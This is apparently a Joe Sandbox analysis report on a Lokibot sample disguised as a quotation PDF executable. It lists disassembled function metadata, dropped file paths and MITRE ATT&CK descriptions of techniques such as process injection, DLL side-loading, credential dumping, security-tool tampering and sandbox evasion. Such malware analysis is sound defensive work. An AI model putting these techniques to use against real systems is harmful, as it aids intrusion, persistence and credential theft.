Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: 8c9f743a95e2ed60ca48ebb2a141374e00de6ead3e6b7acbc24c92b4cfb516c3
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 8c9f743a95e2ed60ca48ebb2a141374e00de6ead3e6b7acbc24c92b4cfb516c3
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_mexnJkivovwH.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 97c05e97c8173f6be26ae818b5776147fb3e9d7db23be9392c32e12bab91489d
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 97c05e97c8173f6be26ae818b5776147fb3e9d7db23be9392c32e12bab91489d
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation2025-0107pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation2025-0107pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mexnJkivovwH.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mecof2w.g3s.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsvli1cg.pqa.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3i03ykx.xky.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khcjshbf.h4v.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldjobeas.vcx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhvh1cts.kar.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3e3l2fg.y1h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xztlvonk.io5.ps1

C:\Users\user\AppData\Local\Temp\tmp2404.tmp

Windows Analysis Report
Quotation2025-0107pdf.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre